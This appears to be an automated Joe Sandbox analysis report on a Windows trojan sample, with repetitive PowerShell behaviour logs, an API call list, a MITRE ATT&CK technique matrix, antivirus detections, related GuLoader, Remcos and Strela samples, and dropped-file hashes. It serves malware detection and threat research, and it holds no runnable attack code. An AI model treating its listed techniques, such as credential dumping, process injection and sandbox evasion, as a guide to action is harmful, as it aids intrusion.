Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeCode function: 0_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033D8

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
Windows Management Instrumentation		1
DLL Side-Loading		1
Access Token Manipulation		11
Masquerading		OS Credential Dumping11
Security Software Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Shared Modules		Boot or Logon Initialization Scripts111
Process Injection		31
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop Protocol1
Clipboard Data		Junk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
PowerShell		Logon Script (Windows)1
DLL Side-Loading		1
Access Token Manipulation		Security Account Manager31
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
Process Injection		NTDS1
Application Window Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Software Packing		LSA Secrets1
Remote System Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials2
File and Directory Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync34
System Information Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
MPkM9Dd99B.exe65%VirustotalBrowse
MPkM9Dd99B.exe70%ReversingLabsWin32.Trojan.Leonem
MPkM9Dd99B.exe100%AviraHEUR/AGEN.1331786

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\nsz930C.tmp\nsExec.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsz930C.tmp\nsExec.dll0%VirustotalBrowse

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.210.172
truefalse
    		high
    default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
    		217.20.57.20
    		truefalse
      		high

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://nsis.sf.net/NSIS_ErrorMPkM9Dd99B.exefalse
        		high
        http://nsis.sf.net/NSIS_ErrorErrorMPkM9Dd99B.exefalse
          		high

          World Map of Contacted IPs

          No contacted IP infos

          General Information

          Joe Sandbox version:42.0.0 Malachite
          Analysis ID:1589010
          Start date and time:2025-01-11 08:20:53 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 7m 46s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:42
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:MPkM9Dd99B.exe
          renamed because original name is a hash value
          Original Sample Name:8f05778ed21cceef05e278694c609c70659bdc5fc7a975630224c922544689f0.exe
          Detection:MAL
          Classification:mal76.evad.winEXE@4491/22@0/0
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 47
          • Number of non-executed functions: 25
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Override analysis time to 240s for powershell

          Warnings

          • Exclude process from analysis (whitelisted): dllhost.exe
          • Excluded IPs from analysis (whitelisted): 52.149.20.212, 217.20.57.20, 20.242.39.171, 13.107.246.45
          • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtCreateKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryAttributesFile calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtWriteVirtualMemory calls found.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          02:21:53API Interceptor1486x Sleep call for process: powershell.exe modified
          02:22:09API Interceptor2x Sleep call for process: SIHClient.exe modified

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          bg.microsoft.map.fastly.net71621480653828912.jsGet hashmaliciousStrela DownloaderBrowse
          • 199.232.210.172
          3129912127106722813.jsGet hashmaliciousStrela DownloaderBrowse
          • 199.232.214.172
          1505131979137938490.jsGet hashmaliciousStrela DownloaderBrowse
          • 199.232.210.172
          3000822141700718957.jsGet hashmaliciousStrela DownloaderBrowse
          • 199.232.210.172
          700123582683323683.jsGet hashmaliciousStrela DownloaderBrowse
          • 199.232.214.172
          3274215974163975076.jsGet hashmaliciousStrela DownloaderBrowse
          • 199.232.214.172
          326794322661816170.jsGet hashmaliciousStrela DownloaderBrowse
          • 199.232.214.172
          2948124376300195806.jsGet hashmaliciousStrela DownloaderBrowse
          • 199.232.210.172
          1264213928938610773.jsGet hashmaliciousStrela DownloaderBrowse
          • 199.232.210.172
          2iH7rqx9rQ.exeGet hashmaliciousRemcosBrowse
          • 199.232.214.172
          default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com3274215974163975076.jsGet hashmaliciousStrela DownloaderBrowse
          • 217.20.57.36
          Yv24LkKBY6.exeGet hashmaliciousUnknownBrowse
          • 217.20.57.20
          2iH7rqx9rQ.exeGet hashmaliciousRemcosBrowse
          • 217.20.57.36
          369248682699819312.jsGet hashmaliciousStrela DownloaderBrowse
          • 217.20.57.36
          11626244731900027402.jsGet hashmaliciousStrela DownloaderBrowse
          • 217.20.57.21
          1554336511338510086.jsGet hashmaliciousStrela DownloaderBrowse
          • 84.201.210.37
          3107622714995924320.jsGet hashmaliciousStrela DownloaderBrowse
          • 84.201.210.23
          709291801716322197.jsGet hashmaliciousStrela DownloaderBrowse
          • 84.201.210.23
          244312574730704684.jsGet hashmaliciousStrela DownloaderBrowse
          • 217.20.57.18
          12071652839003777.jsGet hashmaliciousStrela DownloaderBrowse
          • 217.20.57.20

          ASNs

          No context

          JA3 Fingerprints

          No context

          Dropped Files

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          C:\Users\user\AppData\Local\Temp\nsz930C.tmp\nsExec.dllRzEqKuZBuK.exeGet hashmaliciousGuLoaderBrowse
            RzEqKuZBuK.exeGet hashmaliciousGuLoaderBrowse
              vfhlZ0vrbe.exeGet hashmaliciousUnknownBrowse
                vfhlZ0vrbe.exeGet hashmaliciousUnknownBrowse
                  HJEbEB40vP.exeGet hashmaliciousGuLoaderBrowse
                    HJEbEB40vP.exeGet hashmaliciousGuLoaderBrowse
                      004552024107.bat.exeGet hashmaliciousGuLoaderBrowse
                        DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeGet hashmaliciousGuLoaderBrowse
                          Order 00293884800595.bat.exeGet hashmaliciousGuLoaderBrowse
                            004552024107.bat.exeGet hashmaliciousGuLoaderBrowse

                              Created / dropped Files

                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                              Download File
                              Process:C:\Windows\System32\SIHClient.exe
                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4761 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                              Category:dropped
                              Size (bytes):4761
                              Entropy (8bit):7.945585251880973
                              Encrypted:false
                              SSDEEP:96:6ZUpZsm0HwZ8FLSeXs+aiL9qcZ7KtlAD1GlNHgdkVI5F11AcNmwkVFzGz6ENhZC7:62T0QOLl8vAqcZ7K3AUNAdx5FAx9VEOj
                              MD5:77B20B5CD41BC6BB475CCA3F91AE6E3C
                              SHA1:9E98ACE72BD2AB931341427A856EF4CEA6FAF806
                              SHA-256:5511A9B9F9144ED7BDE4CCB074733B7C564D918D2A8B10D391AFC6BE5B3B1509
                              SHA-512:3537DA5E7F3ABA3DAFE6A86E9511ABA20B7A3D34F30AEA6CC11FEEF7768BD63C0C85679C49E99C3291BD1B552DED2C6973B6C2F7F6D731BCFACECAB218E72FD4
                              Malicious:false
